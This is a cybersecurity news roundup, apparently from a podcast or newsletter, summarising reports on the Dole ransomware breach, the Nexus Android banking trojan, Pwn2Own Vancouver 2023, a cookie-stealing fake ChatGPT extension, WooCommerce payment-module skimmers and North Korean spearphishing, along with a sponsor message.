Cyber Security Headlines: Dole data breach, Nexus banking trojan, Pwn2Own Vancouver 2023

Dole discloses data breach after February ransomware attack

Last month, the food multinational Dole Food Company announced that it has suffered a ransomware attack that impacted its operations. It has now confirmed that threat actors behind the attack had access to the information of an undisclosed number of employees. Despite the company denying a huge impact on its operations, it was forced to shut down production plants and shipments for a short period.

(Security Affairs

New Android banking trojan targets financial apps

Already adopted by threat actors to target 450 financial applications, Nexus provides all the main features to perform ATO attacks (Account Takeover) against banking portals and cryptocurrency services, such as credentials stealing and SMS interception. It appears to be in its early stages of development, and is advertised as a subscription service a monthly fee of $3,000. Details of the malware were first documented by Cyble earlier this month, and the majority of the Nexus infections thus far have been reported in Turkey.

(The Hacker News)

Pwn2Own Vancouver 2023 Day 1: Windows 11 and Tesla hacked

On the first day of Pwn2Own Vancouver 2023, security researchers successfully demoed Tesla Model 3, Windows 11, and macOS zero-day exploits and exploit chains to win $375,000 and a Tesla Model 3. Adobe Reader, Microsoft’s SharePoint team collaboration platform, and Oracle VirtualBox were also taken down. After zero-day vulnerabilities are demoed and disclosed during Pwn2Own, vendors have 90 days to create and release security fixes for all reported flaws before Trend Micro’s Zero Day Initiative publicly discloses them.

(Bleeping Computer)

Bogus ChatGPT extension steals Facebook cookies

Google has removed a ChatGPT extension from the Chrome store that steals Facebook session cookies – but not before more than 9,000 users had installed it. The malicious extension – Chat GPT For Google (note the erroneous space in the name of the chatbot) – is very similar in name and code to the real ChatGPT For Google extension. In fact, the phony extension is based on the same open source project used by the actual ChatGPT For Google tool – all the fraudsters had to do was add a few lines of cookie-stealing code. The cookie thieves push the fake add-on through malicious, sponsored Google Search results for “Chat GPT 4,” the researchers said, thus capitalizing on users who want to try out the latest version of the chatbot. 

(The Register)

Thanks to this week’s episode sponsor, Conveyor

Does the thought of answering another security questionnaire make you want to beat the stuffing out of 32 pinatas? 
Then you might want to check out Conveyor: the end-to-end trust platform helping infosec teams reduce incoming questionnaires and fly through the ones they do have to complete.
Give customers access to a self-serve trust portal to download docs and FAQs. For any remaining questionnaires that do come in, use our GPT-Questionnaire response tool or white-glove questionnaire completion service to knock them completely off your to-do list. 
Learn more at

Stealthy hacks show advancements in China’s cyberespionage operations, researchers say

A string of recently discovered digital intrusions appears to indicate that hackers linked to China are increasingly savvy when it comes to evading detection once they infiltrate a victim’s network. This conclusion comes from researchers at Sentinel Labs and the German IT services company QGroup who studied several cyber intrusions into unnamed Middle Eastern telecoms. Those attacks indicated that a years-long Chinese-aligned cyberespionage operation has been actively updating its abilities using a series of modifications to a widely used credential theft software package, researchers said in a joint analysis published Thursday.


UK government sets out vision for NHS cybersecurity

The UK government has published a new strategy designed to boost cyber-resilience in the health and social care sector by 2030 with the goal of helping the sector’s disparate organizations improve cyber-risk management, data protection and incident response and recovery. Although the details will not be ready until summer, the government shared the five pillars of the new strategy, designed to minimize cyber risk and improve incident response. They are:

• Identify where disruption will cause the greatest harm to patients, such as disruption to critical services

• Unite the sector to take advantage of scale, tap national resources and expertise, and accelerate response

• Ensure leaders are engaged, employees know the cyber basics and more security specialists are recruited

• Embed security into emerging technology to better protect it from cyber-threats

• Support every health and care organization to minimize the impact of incidents and recovery time

(InfoSecurity Magazine)

Hackers inject credit card stealers into payment processing modules

A new credit card stealing hacking campaign is doing things differently than we have seen in the past by hiding their malicious code inside the ‘’ payment gateway module for WooCommerce, allowing the breach to evade detection by security scans. Historically, when threat actors breach a commerce site like Magenta or WordPress running WooCommerce, they inject malicious JavaScript into the HTML of the store or customer checkout pages. However, many online merchants now work with security software companies that scan the HTML of public-facing eCommerce sites to find malicious scripts, making it harder for threat actors to stay hidden. To evade detection, the threat actors are now injecting malicious scripts directly into the site’s payment gateway modules used to process credit card payments on checkout. As these extensions are usually only called after a user submits their credit card details and checks out at the store, it may be harder to detect by cybersecurity solutions.

(Bleeping Computer)

North Korean APT group ‘Kimsuky’ targeting experts with new spearphishing campaign

German and South Korean government agencies this week warned about a new spearphishing campaign from a notorious North Korean group targeting experts on the peninsula. The campaign gains access to victims’ Google accounts through the infection of Android phones through a malicious app on Google Play and the use of a malicious Chromium web browser extension. The hacking attack is mainly targeting experts on the Korean Peninsula and North Korea, but since the technology exploited in this attack can be used universally, it can be used by foreign affairs and security think tanks around the world as well as unspecified people.

(The Record)